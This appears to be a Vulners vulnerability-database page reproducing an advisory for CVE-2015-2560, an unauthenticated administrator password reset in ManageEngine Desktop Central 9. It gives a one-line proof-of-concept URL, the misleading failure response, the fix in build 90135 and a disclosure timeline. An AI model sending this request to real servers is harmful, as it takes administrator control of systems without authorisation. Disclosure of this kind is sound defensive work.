Vulners
Lucene search
Manage Engine Desktop Central 9 Unauthorized Administrative Password Reset Vulnerability
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | ManageEngine Desktop Central Password Reset Security Bypass Vulnerability | 11 May 201800:00 | – | cnvd |
 | ManageEngine Desktop Central Unauthorized Administrative Password Reset (CVE-2015-2560) | 6 Apr 201500:00 | – | checkpoint_advisories |
 | CVE-2015-2560 | 2 Aug 201719:00 | – | cve |
 | CVE-2015-2560 | 2 Aug 201719:00 | – | cvelist |
 | ManageEngine Desktop Central < 9 Build 90135 Unauthenticated Admin Password Reset | 31 Mar 201500:00 | – | nessus |
 | CVE-2015-2560 | 2 Aug 201719:29 | – | nvd |
 | Manage Engine Desktop Central 9 Unauthorized Administrative Password Reset | 27 Mar 201500:00 | – | packetstorm |
 | Design/Logic Flaw | 2 Aug 201719:29 | – | prion |
 | Manage Engine Desktop Central 9 - CVE-2015-2560 - Unauthorised administrative password reset | 12 May 201500:00 | – | securityvulns |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 12 May 201500:00 | – | securityvulns |
10
A vulnerability exists in the Manage Engine Desktop Central 9 application that affects version (build 90130). This may affect earlier releases as well.
The vulnerability allows a remote unauthenticated user to change the password of any Manage Engine Desktop Central user with the ‘Administrator’ role (DCAdmin).
The following proof of concept URL changes the ‘admin’ user password to ‘admin3’.
http://<IP>:8020/servlets/DCOperationsServlet?operation=addOrModifyUser&roleId=DCAdmin&userName=admin&password=admin3
The XML response suggests the user modification failed, however a user can perform a successful login with the supplied credentials:
<operation>
<operationstatus>Failure</operationstatus>
<message>Problem while modifying user admin in DC.</message>
</operation>
Complete control of the application can now be obtained by an unauthorised user.
Vulnerability remediation:
This vulnerability was fixed in Desktop Central build 90135. Refer to the vendor advisory for product update information and instructions.
Vendor advisory:
https://www.manageengine.com/products/desktop-central/unauthorized-admin-credential-modification.html
Disclosure timeline:
Vendor notification: 02/02/2015
Follow up with Vendor: 16/02/2015
Fixed released: 18/02/2015
CVE requested: 06/03/2015
CVE assigned: 20/03/2015
Vendor notification: 24/03/2015
Public disclosure: 27/03/2015
# 0day.today [2018-03-16] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Mar 2015 00:00Current
9.5High risk
Vulners AI Score9.5
EPSS0.20364